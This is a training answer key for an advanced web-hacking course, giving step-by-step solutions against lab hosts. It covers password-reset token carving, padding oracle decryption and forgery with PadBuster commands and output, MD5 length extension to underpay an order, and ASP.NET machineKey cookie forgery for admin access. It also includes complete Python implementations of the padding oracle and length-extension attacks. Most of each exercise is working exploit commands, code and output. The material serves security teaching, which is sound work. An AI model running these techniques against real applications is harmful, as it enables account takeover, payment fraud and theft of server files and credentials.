AnswerSheet Part2

The document is a training answer paper for Advanced Web Hacking, detailing various attack methodologies such as Known Plaintext Attack, Padding Oracle Attack, and Remote Code Execution techniques. It provides step-by-step solutions for exploiting vulnerabilities in web applications, including password reset hijacking and decrypting ciphertexts. Each module includes practical examples and commands for executing the attacks effectively.

Advanced Web Hacking (Part 2)

Answer Paper

NSS Training – AWH 5D Answer Paper

Contents

Module: Breaking Crypto
  Known Plaintext Attack
  Padding Oracle Attack
  Exploiting padding oracles with fixed IVs
  Hash length extension Attack
  Auth Bypass using pre-shared MachineKey
Module: Remote Code Execution (RCE)
  PHP Object Injection
  PHP Deserialization Attack
  Java Deserialization Attack - Binary
  Bonus: Tricky Java Deserialization Attack - Binary
  Java Deserialization Attack - XML
  Jackson JSON Deserialization Attack
  .NET Serialization Attack
  Python Serialization Attack
  Bonus: Plex Python Deserialization
  Ruby/ERB Template Injection

© Claranet Cyber Security 2021. All rights reserved

Module: Breaking Crypto

Known Plaintext Attack


Challenge URL: http://topup.webhacklab.com/Account/ForgotPassword

• Reset the password of the user “[email protected]” by generating a valid password reset link

Solution:
Step 1: Initiate a forgot-password request for the user “[email protected]” in the topup application:

Step 2: The user will receive the password reset link with a “token” in the registered email as shown
below:


http://topup.webhacklab.com/Account/ResetPassword?code=6cD0nQOLXoX5XlJubw3SIDDXSu5K9u5roALwtIEGJc8hCFop2kCH4j6LceF2P8D/&userId=b19d4b82-56ad-407d-9191-9715c1698166

Send another password reset request for the same user and notice that the token in the reset link stays the same: the token is derived deterministically from the account, with no per-request randomness.

Step 3: Register another account with the email “[email protected]” and request a password reset for it. Converting both tokens to hex as shown below reveals that a large portion of the hex is identical for the two accounts. The encryption in use is therefore deterministic: a given plaintext always produces the same ciphertext, so the parts of the token that do not depend on the user come out identical in every token.

http://topup.webhacklab.com/Account/ResetPassword?userId=b314960e-dbaf-4979-b841-0c6b175c3dab&code=%2BvheISv88Uo85l4reA7D%2BDDXSu5K9u5roALwtIEGJc8hCFop2kCH4j6LceF2P8D%2F

User : [email protected]

Token Value = +vheISv88Uo85l4reA7D+DDXSu5K9u5roALwtIEGJc8hCFop2kCH4j6LceF2P8D/

Base64 to Bytes to Hex:

root@Kali:~# echo "+vheISv88Uo85l4reA7D+DDXSu5K9u5roALwtIEGJc8hCFop2kCH4j6LceF2P8D/" | base64 -d | xxd -p

Hex Value = FAF85E212BFCF14A3CE65E2B780EC3F830D74AEE4AF6EE6BA002F0B4810625CF21085A29DA4087E23E8B71E1763FC0FF


Step 4: Based on that analysis, hijack the account “[email protected]”: register another account “[email protected]”, take its password reset token, trim off the first 16 bytes (the only block that differs between users) and use the remaining bytes to build a password reset link for “[email protected]”:

User: [email protected]

Token Value = 6cD0nQOLXoX5XlJubw3SIDDXSu5K9u5roALwtIEGJc8hCFop2kCH4j6LceF2P8D/

Base64 to Bytes to Hex:

root@Kali:~# echo "6cD0nQOLXoX5XlJubw3SIDDXSu5K9u5roALwtIEGJc8hCFop2kCH4j6LceF2P8D/" | base64 -d | xxd -p

Hex Value = E9C0F49D038B5E85F95E526E6F0DD22030D74AEE4AF6EE6BA002F0B4810625CF21085A29DA4087E23E8B71E1763FC0FF

The first 16 bytes (E9C0...D220) are the only block that differs from the other account's token. Dropping them leaves the shared part, which becomes the password reset token for the [email protected] user:

Hex Value = 30D74AEE4AF6EE6BA002F0B4810625CF21085A29DA4087E23E8B71E1763FC0FF

Hex to Bytes to Base64:

root@Kali:~# echo "30D74AEE4AF6EE6BA002F0B4810625CF21085A29DA4087E23E8B71E1763FC0FF" | xxd -r -p | base64

Base64 Encoded Token Value = MNdK7kr27mugAvC0gQYlzyEIWinaQIfiPotx4XY/wP8=


Step 5: Navigate to http://topup.webhacklab.com/Account/ResetPassword?code=MNdK7kr27mugAvC0gQYlzyEIWinaQIfiPotx4XY/wP8=&userId=b314960e-dbaf-4979-b841-0c6b175c3dab and change the password of the user “[email protected]”:

Step 6: The application accepts the carved token and the password is changed, as the figure shows.
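The block comparison behind Steps 3 and 4, as an added Python example (it is not part of the course material). It decodes the two tokens shown above, reports which 16-byte blocks are identical at the same position in both, and carves off the user-specific first block exactly as Step 4 does. Identical ciphertext blocks in two users' tokens are the signature of deterministic encryption (ECB, or CBC with a constant IV) of plaintexts that share content; the only inputs are the two token strings from this exercise.

```python
import base64
from typing import List

BLOCK = 16

# The two tokens observed in Steps 2 and 3 (taken from this exercise).
TOKEN_A = "6cD0nQOLXoX5XlJubw3SIDDXSu5K9u5roALwtIEGJc8hCFop2kCH4j6LceF2P8D/"
TOKEN_B = "+vheISv88Uo85l4reA7D+DDXSu5K9u5roALwtIEGJc8hCFop2kCH4j6LceF2P8D/"


def blocks(token_b64: str, size: int = BLOCK) -> List[bytes]:
    """Decode a Base64 token and split it into fixed-size cipher blocks."""
    raw = base64.b64decode(token_b64)
    return [raw[i:i + size] for i in range(0, len(raw), size)]


def shared_blocks(a_b64: str, b_b64: str, size: int = BLOCK) -> List[int]:
    """Indices of blocks that are byte-for-byte identical in both tokens.
    Any hit means the same plaintext block encrypted to the same ciphertext,
    i.e. no randomness per encryption (ECB, or CBC with a constant IV)."""
    a, b = blocks(a_b64, size), blocks(b_b64, size)
    return [i for i, (x, y) in enumerate(zip(a, b)) if x == y]


def carve_tail(token_b64: str, skip_blocks: int = 1, size: int = BLOCK) -> str:
    """Drop the leading user-specific block(s) and re-encode the rest (Step 4)."""
    raw = base64.b64decode(token_b64)
    return base64.b64encode(raw[skip_blocks * size:]).decode()


def report(a_b64: str, b_b64: str, size: int = BLOCK) -> str:
    """Side-by-side hex dump of both tokens, one line per block."""
    lines = []
    for i, (x, y) in enumerate(zip(blocks(a_b64, size), blocks(b_b64, size))):
        verdict = "SAME" if x == y else "differs"
        lines.append("block %d: %s  %s  %s" % (i, x.hex(), y.hex(), verdict))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(TOKEN_A, TOKEN_B))
    print("shared block indices:", shared_blocks(TOKEN_A, TOKEN_B))
    print("carved token:", carve_tail(TOKEN_A))
```

Running the script prints the per-block comparison and the carved token. The same comparison applied to any two tokens issued to different accounts (or to the same account twice) is a quick test for a missing or constant IV, before spending time on a full cryptanalysis.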


Padding Oracle Attack


Challenge URL: http://topup.webhacklab.com/download.aspx?invoice={ciphertext_invoice}

Identify a padding oracle vulnerability to:

• Decrypt the ciphertext for the invoice parameter.
• Encrypt the payload to download the content of the “web.config” file from the server

Solution:
The application takes an encrypted value in the invoice parameter and uses the decrypted value as the name of the file to return.

Step 1: When a valid ciphertext is passed in the invoice parameter, the application returns the content of a file as shown in the figure below.

http://topup.webhacklab.com/download.aspx?invoice=hXzPd+J2DtGGJfCvIoRbULfadd1LWrfHVuYgw6AAIdUt3+PhqjE5J0hj1uu9ed8wcJvXpFvCIMMEP882ywGBkA==


Step 2: When a modified ciphertext is passed in the invoice parameter (here the last Base64 character has been changed), the application responds with a bad padding error.

http://topup.webhacklab.com/download.aspx?invoice=hXzPd+J2DtGGJfCvIoRbULfadd1LWrfHVuYgw6AAIdUt3+PhqjE5J0hj1uu9ed8wcJvXpFvCIMMEP882ywGBaA==

This difference in behaviour is the padding oracle: the server tells us whether an arbitrary ciphertext decrypts to correctly padded plaintext. That single bit per request is enough to decrypt the ciphertext, and to forge ciphertexts for chosen plaintext, without ever knowing the key.

Step 3: PadBuster automates the attack. Decrypt the ciphertext with the following command (block size 16; -encoding 0 means Base64; the string "Padding" in a response marks a failed decryption). The 64-byte ciphertext is treated as an IV followed by three blocks, which is why PadBuster reports three blocks:

./padbuster.pl "http://topup.webhacklab.com/download.aspx?invoice=hXzPd+J2DtGGJfCvIoRbULfadd1LWrfHVuYgw6AAIdUt3+PhqjE5J0hj1uu9ed8wcJvXpFvCIMMEP882ywGBkA==" "hXzPd+J2DtGGJfCvIoRbULfadd1LWrfHVuYgw6AAIdUt3+PhqjE5J0hj1uu9ed8wcJvXpFvCIMMEP882ywGBkA==" 16 -encoding 0 -error "Padding"

+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| [email protected] |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 6895

INFO: Starting PadBuster Decrypt Mode


*** Starting Block 1 of 3 ***

[+] Success: (156/256) [Byte 16]
[+] Success: (160/256) [Byte 15]
[+] Success: (75/256) [Byte 14]
[+] Success: (238/256) [Byte 13]
[+] Success: (104/256) [Byte 12]
[+] Success: (63/256) [Byte 11]
[+] Success: (189/256) [Byte 10]
[+] Success: (71/256) [Byte 9]
[+] Success: (23/256) [Byte 8]
[+] Success: (203/256) [Byte 7]
[+] Success: (183/256) [Byte 6]
[+] Success: (33/256) [Byte 5]
[+] Success: (229/256) [Byte 4]
[+] Success: (93/256) [Byte 3]
[+] Success: (191/256) [Byte 2]
[+] Success: (95/256) [Byte 1]

Block 1 Results:
[+] Cipher Text (HEX): b7da75dd4b5ab7c756e620c3a00021d5
[+] Intermediate Bytes (HEX): b14ead16d3423fe0b144c79d16b66265
[+] Plain Text: 42ba14117a724295

*** Starting Block 2 of 3 ***

[+] Success: (29/256) [Byte 16]
[+] Success: (191/256) [Byte 15]
[+] Success: (202/256) [Byte 14]
[+] Success: (62/256) [Byte 13]
[+] Success: (1/256) [Byte 12]
[+] Success: (240/256) [Byte 11]
[+] Success: (40/256) [Byte 10]
[+] Success: (149/256) [Byte 9]
[+] Success: (5/256) [Byte 8]
[+] Success: (118/256) [Byte 7]
[+] Success: (151/256) [Byte 6]
[+] Success: (140/256) [Byte 5]
[+] Success: (30/256) [Byte 4]
[+] Success: (225/256) [Byte 3]
[+] Success: (28/256) [Byte 2]
[+] Success: (59/256) [Byte 1]


Block 2 Results:
[+] Cipher Text (HEX): 2ddfe3e1aa3139274863d6ebbd79df30
[+] Intermediate Bytes (HEX): d5eb11ef786280f263df16fac63543e2
[+] Plain Text: b1d238755969f5b7

*** Starting Block 3 of 3 ***

[+] Success: (198/256) [Byte 16]
[+] Success: (42/256) [Byte 15]
[+] Success: (143/256) [Byte 14]
[+] Success: (78/256) [Byte 13]
[+] Success: (27/256) [Byte 12]
[+] Success: (37/256) [Byte 11]
[+] Success: (145/256) [Byte 10]
[+] Success: (181/256) [Byte 9]
[+] Success: (219/256) [Byte 8]
[+] Success: (200/256) [Byte 7]
[+] Success: (207/256) [Byte 6]
[+] Success: (54/256) [Byte 5]
[+] Success: (127/256) [Byte 4]
[+] Success: (103/256) [Byte 3]
[+] Success: (72/256) [Byte 2]
[+] Success: (237/256) [Byte 1]

Block 3 Results:
[+] Cipher Text (HEX): 709bd7a45bc220c3043fcf36cb018190
[+] Intermediate Bytes (HEX): 03b7978cc63a322c4368dde0b672d43b
[+] Plain Text: .html

-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): 42ba14117a724295b1d238755969f5b7.html

[+] Decrypted value (HEX): 34326261313431313761373234323935623164323338373535393639663562372E68746D6C0B0B0B0B0B0B0B0B0B0B0B

[+] Decrypted value (Base64): NDJiYTE0MTE3YTcyNDI5NWIxZDIzODc1NTk2OWY1YjcuaHRtbAsLCwsLCws


Alternative: the padding-oracle-attacker tool also automates padding oracle attacks. Decrypt the ciphertext with the following command:

padding-oracle-attacker decrypt "http://topup.webhacklab.com/download.aspx?invoice=" b64:hXzPd+J2DtGGJfCvIoRbULfadd1LWrfHVuYgw6AAIdUt3+PhqjE5J0hj1uu9ed8wcJvXpFvCIMMEP882ywGBkA== 16 Padding -e base64


Encrypt payload to download arbitrary files (web.config in this case)

Step 4: Run padbuster with the -plaintext argument (encrypt mode) to create a ciphertext that decrypts to "../../web.config". Encrypt mode works backwards: it starts from an arbitrary final block (all zeros), uses the oracle to recover the intermediate state of that block, XORs in the desired plaintext to obtain the preceding ciphertext block, and repeats until it has produced the IV. No key is needed.

./padbuster.pl "http://topup.webhacklab.com/download.aspx?invoice=hXzPd+J2DtGGJfCvIoRbULfadd1LWrfHVuYgw6AAIdUt3+PhqjE5J0hj1uu9ed8wcJvXpFvCIMMEP882ywGBkA==" "hXzPd+J2DtGGJfCvIoRbULfadd1LWrfHVuYgw6AAIdUt3+PhqjE5J0hj1uu9ed8wcJvXpFvCIMMEP882ywGBkA==" 16 -encoding 0 -error "Padding" -plaintext ../../web.config

+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| [email protected] |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 643

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 2

[+] Success: (212/256) [Byte 16]
[+] Success: (196/256) [Byte 15]
[+] Success: (44/256) [Byte 14]
[+] Success: (219/256) [Byte 13]
[+] Success: (223/256) [Byte 12]
[+] Success: (26/256) [Byte 11]
[+] Success: (109/256) [Byte 10]
[+] Success: (118/256) [Byte 9]
[+] Success: (235/256) [Byte 8]
[+] Success: (142/256) [Byte 7]
[+] Success: (231/256) [Byte 6]
[+] Success: (142/256) [Byte 5]
[+] Success: (215/256) [Byte 4]
[+] Success: (82/256) [Byte 3]
[+] Success: (124/256) [Byte 2]
[+] Success: (209/256) [Byte 1]


Block 2 Results:
[+] New Cipher Text (HEX): 2f9bb0346e02680c9284f03431c72e3d
[+] Intermediate Bytes (HEX): 3f8ba0247e12781c8294e02421d73e2d

[+] Success: (26/256) [Byte 16]
[+] Success: (125/256) [Byte 15]
[+] Success: (45/256) [Byte 14]
[+] Success: (93/256) [Byte 13]
[+] Success: (251/256) [Byte 12]
[+] Success: (158/256) [Byte 11]
[+] Success: (194/256) [Byte 10]
[+] Success: (31/256) [Byte 9]
[+] Success: (7/256) [Byte 8]
[+] Success: (63/256) [Byte 7]
[+] Success: (239/256) [Byte 6]
[+] Success: (107/256) [Byte 5]
[+] Success: (140/256) [Byte 4]
[+] Success: (105/256) [Byte 3]
[+] Success: (206/256) [Byte 2]
[+] Success: (185/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 7913b657b735bc958b17076fc9b6e880
[+] Intermediate Bytes (HEX): 573d9979991acbf0e9396400a7d081e7

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: eRO2V7c1vJWLFwdvybbogC%2BbsDRuAmgMkoTwNDHHLj0AAAAAAAAAAAAAAAAAAAAA
-------------------------------------------------------


Alternative: run padding-oracle-attacker with the "encrypt" argument to create a ciphertext for the plaintext "../../web.config":

padding-oracle-attacker encrypt "http://topup.webhacklab.com/download.aspx?invoice=" "../../web.config" 16 Padding -e base64

Step 5: Open the following URL with view-source, as the file content is returned inside the page's HTML, to read the contents of web.config:

view-source:http://topup.webhacklab.com/download.aspx?invoice=eRO2V7c1vJWLFwdvybbogC%2BbsDRuAmgMkoTwNDHHLj0AAAAAAAAAAAAAAAAAAAAA


Exploiting padding oracles with fixed IVs


Challenge URL: http://reimbursement.webhacklab.com/Support/LoadSupportTicketFile

• Access the file with id=0, which should be accessible only to an admin.

Solution:
Step 1: Log in to the application, click the 'Support' button and then the 'View' link as shown in the figure:

Step 2: To view the file that was uploaded when a support ticket was created, click the link in the 'FileName' column as shown in the figure:


Step 3: Clicking that link sends a request to the server containing the file id in the 'id' parameter and a user token. If the token is valid and the file id belongs to the logged-in user, the application responds with the content of that file, as shown in the figure:

Step 4: Requesting id=0 directly, as the challenge asks, makes the application respond with the error 'File not found!!', as shown in the figure:


Step 5: To access the file with id=0 we need a token that belongs to the user who owns it. The token is encrypted, and any modification to it makes the application respond with 'padding error', as shown in the figure. That error message is a padding oracle.

Step 6: Decrypt the token with PadBuster as shown in the figure. The token is hex-encoded, hence -encoding 1 (lower-case hex), and the session cookie must be supplied so that the requests are authenticated:

Command:

./padbuster.pl "http://reimbursement.webhacklab.com/Support/LoadSupportTicketFile?id=X&token=$TOKEN$" "$TOKEN$" 16 -encoding 1 -cookies .AspNet.ApplicationCookie=$SESSION_COOKIE_VALUE$ -error "Padding"


Alternative: decrypt the token with padding-oracle-attacker as shown in the figure:

Command:

padding-oracle-attacker decrypt "http://reimbursement.webhacklab.com/Support/LoadSupportTicketFile?id=X&token=" "hex:$TOKEN$" -H "Cookie: .AspNet.ApplicationCookie=$SESSION_COOKIE_VALUE$" 16 Padding -e hex


Step 7: Using padbuster's encrypt mode, create a ciphertext for the plaintext '","user":"admin"}' as shown in the figure (the leading quote and comma are deliberate; see Step 8):

Command:

./padbuster.pl "http://reimbursement.webhacklab.com/Support/LoadSupportTicketFile?id=0&token=$TOKEN$" "$TOKEN$" 16 -encoding 1 -cookies .AspNet.ApplicationCookie=$SESSION_COOKIE_VALUE$ -error "Padding" -plaintext '","user":"admin"}'


Alternative: create the same ciphertext with padding-oracle-attacker as shown in the figure:

Command:

padding-oracle-attacker encrypt "http://reimbursement.webhacklab.com/Support/LoadSupportTicketFile?id=0&token=" -H "Cookie: .AspNet.ApplicationCookie=$SESSION_COOKIE_VALUE$" '","user":"admin"}' 16 Padding -e hex

Step 8: Take the first 2 blocks, i.e. 32 bytes (64 hex characters), of the original token, append the newly generated ciphertext to them and send the result as the token to access id=0. The splice is needed because the IV is fixed on the server and not part of the token: the first block of the generated ciphertext cannot act as an IV, so the server decrypts it to 16 bytes of junk. Keeping two genuine blocks in front makes the start of the token decrypt to its real JSON, the junk block lands inside the string value those blocks leave open, and the leading quote of '","user":"admin"}' closes that string before the forged user field.
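Both padding-oracle exercises above, worked end to end as an added Python example (this is not course material and not PadBuster's code). The target is simulated in-process with a constructed 4-round Feistel block cipher built on SHA-256, standing in for AES so the script needs only the standard library; the key, the fixed IV, the ticket JSON and the file name are all constructed values. The attack code only ever calls the oracle: recover_intermediate is the byte-at-a-time core, attack_decrypt and attack_encrypt correspond to PadBuster's decrypt and -plaintext modes against download.aspx, and forge_admin performs the Step 8 splice against a fixed-IV server, retrying with a different final block when the junk block happens to contain a quote or backslash that breaks the JSON.

```python
import hashlib
import json

BLOCK = 16
KEY = b"constructed-demo-key"        # assumption: the server's secret key
FIXED_IV = b"\x00" * BLOCK           # assumption: the reimbursement app's fixed IV


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def feistel(key, blk, decrypt=False):
    """Constructed 4-round Feistel cipher over SHA-256; stands in for AES."""
    l, r = (blk[8:], blk[:8]) if decrypt else (blk[:8], blk[8:])
    for i in (range(3, -1, -1) if decrypt else range(4)):
        l, r = r, _xor(l, hashlib.sha256(key + bytes([i]) + r).digest()[:8])
    return r + l if decrypt else l + r

def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):                      # the check whose outcome the server leaks
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, pt):
    pt, out, prev = pad(pt), b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = feistel(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(feistel(key, ct[i:i + BLOCK], True), prev)
        prev = ct[i:i + BLOCK]
    return unpad(out)

def make_oracle(key, iv=None):
    """iv=None: first submitted block is the IV (download.aspx); else fixed IV."""
    def oracle(ct):
        try:
            cbc_decrypt(key, *((ct[:BLOCK], ct[BLOCK:]) if iv is None else (iv, ct)))
            return True
        except ValueError:
            return False
    return oracle

def recover_intermediate(oracle, blk):
    """D_k(blk), one byte at a time from the right, at most 256 probes each."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos
        for g in range(256):
            probe = bytearray(inter[j] ^ padv if j > pos else 0 for j in range(BLOCK))
            probe[pos] = g
            if not oracle(bytes(probe) + blk):
                continue
            if pos == BLOCK - 1:      # a 0x02 0x02 ending also passes: disambiguate
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + blk):
                    continue
            inter[pos] = g ^ padv
            break
        else:
            raise RuntimeError("oracle accepted no guess")
    return bytes(inter)

def attack_decrypt(oracle, chain):
    """Plaintext of chain = IV||C1..Cn without the key: P_i = D(C_i) xor C_(i-1)."""
    blks = [chain[i:i + BLOCK] for i in range(0, len(chain), BLOCK)]
    return unpad(b"".join(_xor(recover_intermediate(oracle, c), p)
                          for p, c in zip(blks, blks[1:])))

def attack_encrypt(oracle, pt, last=bytes(BLOCK)):
    """Forge IV||C1..Cn for pt, backwards from an arbitrary last block (PadBuster's zeros)."""
    padded, out = pad(pt), last
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        out = _xor(recover_intermediate(oracle, out[:BLOCK]), padded[i:i + BLOCK]) + out
    return out

def forge_admin(key=KEY):
    """Step 8 against a fixed-IV server: keep two genuine blocks (their plaintext
    survives because the IV is fixed), append a forged chain whose first block
    becomes 16 junk bytes inside the still-open "ticket" string; the tail's
    leading quote closes it. Retry with another last block if the junk breaks JSON."""
    genuine = cbc_encrypt(key, FIXED_IV,
                          b'{"ticket":"2f1c0d9b-7a2e-4e8f-9b3c-1a5d6e7f8a9b","user":"bob"}')
    oracle = make_oracle(key, FIXED_IV)
    for salt in range(8):
        tail = attack_encrypt(oracle, b'","user":"admin"}', bytes([salt]) + bytes(BLOCK - 1))
        try:   # the server: decrypt under its fixed IV, parse the JSON, trust "user"
            return json.loads(cbc_decrypt(key, FIXED_IV, genuine[:2 * BLOCK] + tail)
                              .decode("latin-1"), strict=False)
        except ValueError:            # the junk block contained a quote or backslash
            continue
    raise RuntimeError("no clean splice in 8 tries")
```

Against a real target every oracle call is an HTTP request, so one 16-byte block costs up to 4096 requests; the extra probe on the last byte is what keeps a chance 0x02 0x02 ending from being mistaken for 0x01, which otherwise corrupts the whole block. The fix on the server side is the same in both exercises: authenticate the ciphertext (an AEAD mode, or encrypt-then-MAC) and return one generic error, so that padding failures are indistinguishable from any other rejection.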


Hash length extension Attack


Challenge URL: http://topup.webhacklab.com/Shop/Topup [Payment]

• Buy a topup for less than the total payable amount using your registered account.

Solution:
Step 1: Log in, navigate to the topup feature of the recharge application, select a topup and initiate the payment process.

Step 2: Intercept the request and send it to Repeater.


Step 3: Notice that the payment amount from the original request is displayed in the response.


Step 4: Tampering with the “transactionid”, “email” or “amount” parameters makes the application return the error message “Hash validation failed”, so the “hash” parameter covers those three values.

Note: Hashing the three values concatenated does not reproduce the “hash” value, which suggests a secret is included in the hash input alongside them. A plain hash over secret||data, rather than an HMAC, is exactly what a length extension attack defeats: from the hash and the length of the input an attacker can continue the hash as if the secret were known.


Step 5: Use the tool “hash_extender” to generate a candidate for every plausible secret length (the length is unknown, so 8 to 18 bytes are tried) with the following command. The appended value is '10' because we want to change the price from '279' to '10':

root@Kali:~/tools/hash_extender# ./hash_extender --data [email protected] --secret-min 8 --secret-max 18 --append 10 --signature 584e373b3c9c5aa6b3ede1129a848083 --format md5 --out-data-format html --table

Where:
--data = the concatenation transactionid+email+amount as sent in the request
--signature = the value of the hash parameter from the request
--format md5 = the 32 hex character signature is an MD5 digest
--out-data-format html = emit the padded data percent-encoded (%80, %00, ...) so it can be pasted into the request


Step 6: Send the HTTP request captured in Step 2 to Intruder.

Step 7: Create the Intruder payload as shown below.

Payload value: everything from the email address up to the last NULL byte (%00), i.e. the email, the original amount and the padding, but not the appended amount, which goes in the amount parameter.


Step 8: Replace the value of the hash parameter with the new signature from the payload generated in Step 5.


Step 9: Select the 'email' parameter as the injection point and change the value of the amount parameter from '279' to '10'.


Step 10: Take the padded values generated by the tool in Step 5, from the email address up to the last NULL byte (%00) as described in Step 7, and paste them into the payload list. Make sure to uncheck the option to URL-encode special characters, since the padding is already percent-encoded.


Step 11: Start the Intruder attack and notice that one of the payloads (the one built with the correct secret length) succeeds.

Step 12: Modify the initial payment request captured in Step 2 by replacing its POST body with the successful payload from Step 11. The response shows that the amount to pay is now 10 GBP instead of 279 GBP.


Step 13: Enter credit card details and complete the transaction.

Step 14: Go to “My Orders” section and check the amount. Notice that the price shown is 279 GBP.


Step 15: You will receive a payment receipt to your registered email, indicating transaction number,
status and the total amount paid (10 GBP in this case).
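The length extension that hash_extender performs, as an added Python example (not course material and not hash_extender's code). MD5 is implemented in full because hashlib cannot be resumed from an arbitrary internal state; extend() takes the signature, the known data and a guessed secret length and returns the padded data plus the new signature, and forge_cheaper_order() produces one candidate per secret length, shaping the email field the way Steps 7 to 10 do so that the server's own concatenation reproduces the extended message. The secret, transaction id, email address and the server-side check are constructed assumptions modelled on what Step 4 revealed.

```python
import hashlib
import math
import struct
from urllib.parse import quote

_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2 ** 32) & 0xFFFFFFFF for i in range(64)]
_INIT = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
_M32 = 0xFFFFFFFF


def _rotl(x, c):
    return ((x << c) | (x >> (32 - c))) & _M32


def _compress(state, block):
    """One MD5 compression of a 64-byte block into the running state."""
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & _M32
        a, d, c, b = d, c, b, (b + _rotl(f, _S[i])) & _M32
    return tuple((x + y) & _M32 for x, y in zip(state, (a, b, c, d)))


def md5_padding(total_len):
    """The bytes MD5 appends to a total_len-byte message before hashing."""
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + struct.pack("<Q", total_len * 8)


def md5(data, state=_INIT, absorbed=0):
    """MD5 of data; with state/absorbed it resumes a hash that has already
    absorbed `absorbed` bytes (a multiple of 64), which hashlib cannot do."""
    buf = data + md5_padding(absorbed + len(data))
    for i in range(0, len(buf), 64):
        state = _compress(state, buf[i:i + 64])
    return struct.pack("<4I", *state)


def extend(signature_hex, known, append, secret_len):
    """From MD5(secret||known) and a guess of len(secret), produce
    (known||glue||append, MD5(secret||known||glue||append))."""
    state = struct.unpack("<4I", bytes.fromhex(signature_hex))
    glue = md5_padding(secret_len + len(known))
    absorbed = secret_len + len(known) + len(glue)
    return known + glue + append, md5(append, state, absorbed).hex()


# Constructed stand-ins for the lab values (the real ones are in the request).
SECRET = b"s3cr3t!!"                       # assumption: 8-byte server-side secret
TXID, EMAIL, AMOUNT = b"TX1001", b"user@example.com", b"279"


def merchant_sign(txid, email, amount, secret=SECRET):
    """hash = MD5(secret || transactionid || email || amount), as Step 4 implies."""
    return hashlib.md5(secret + txid + email + amount).hexdigest()


def merchant_verify(txid, email, amount, sig, secret=SECRET):
    return merchant_sign(txid, email, amount, secret) == sig


def forge_cheaper_order(signature, txid, email, amount, new_amount, secret_min=8, secret_max=18):
    """One candidate per secret length, like hash_extender --secret-min/--secret-max.
    The email field carries the old amount plus the glue (Step 7), so that
    secret||txid||email_field||new_amount is exactly the extended message."""
    out = []
    for n in range(secret_min, secret_max + 1):
        data, sig = extend(signature, txid + email + amount, new_amount, n)
        email_field = data[len(txid):len(data) - len(new_amount)]
        out.append({"secret_len": n, "hash": sig, "amount": new_amount,
                    "email_raw": email_field,
                    "email_urlencoded": quote(email_field, safe="@.")})
    return out
```

Only the candidate whose secret length matches the server's secret verifies, which is what the Intruder run in Step 11 discovers by trial. Replacing the construction with HMAC-MD5 (or any HMAC) closes the hole, because the secret is then mixed in after the data as well and cannot be extended.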


Auth Bypass using pre-shared MachineKey

Challenge URL: http://admin.webhacklab.com/

• Identify a pre-shared Machine Key used in the application using “Blacklist3r”
• Create a new auth token for “admin” user and gain access to the administrative console
• Use http://utility.webhacklab.com/ to generate payloads

Solution:
Step 1: Navigate to “http://admin.webhacklab.com/Home/About” to access the admin interface.

Step 2: Since the user is not authenticated, the application redirects to the login page.


Step 3: On following the redirect, the application sets multiple cookies, one of which is “.ASPXAUTH”. This is the ASP.NET forms authentication ticket that establishes the user identity; it is encrypted and signed with the application's machineKey, so anyone who knows that key can forge it.

Step 4: Use the “Blacklist3r” utility to check whether the application's machineKey is one of the pre-shared keys in Blacklist3r's database. If it is, the tool decrypts the auth cookie and stores the result in a file. The file contains two interesting fields, highlighted below, that both hold the value “anonymous”.


Alternative: You can decrypt the cookie using the web interface URL of Blacklist3r:
http://utility.webhacklab.com/Blacklister.aspx.


Step 5: The next task is to find a valid username for which Blacklist3r can create a valid auth token. The login page is vulnerable to username enumeration: for an invalid username it returns the default “Invalid username and password” error message.

Step 6: For a valid username with an invalid password, however, it returns the “Invalid password” error message. This identifies “admin” as a valid user in the application.


Step 7: With a valid user found, change the username and role information in the decrypted file generated in Step 4 and regenerate the cookie from the modified data with the Blacklist3r command-line utility.


Alternative: To perform this activity on the web utility change the username and role information in
decrypted information panel in Step 4 and re-generate the cookie based on the modified
information.


Step 8: With the new cookie in hand, browse to the admin panel home page and intercept the request.

Step 9: Capture the request in Burp Suite.

Step 10: Replace the existing .ASPXAUTH cookie value with the newly generated one.


Step 11: The cookie is accepted by the server and we have access to the admin panel.


Module: Remote Code Execution (RCE)

PHP Object Injection


Challenge URL: http://shop.webhacklab.com/help.php

• Exploit a PHP object injection instance to access “/etc/passwd” file from the server.

Solution:
Step 1: Navigate to the application “http://shop.webhacklab.com”, click the “Help” link in the footer and then open the “Refund & Cancellation Policies” page as shown below.


Step 2: Let us now investigate the “file” parameter in the URL as seen in the screenshot below.

Step 3: Copy the value of the file parameter from the URL, paste it into Burp Suite's Decoder and decode it as Base64, as shown below. The result is a PHP serialized object that references a file named “refund.html” on the system.


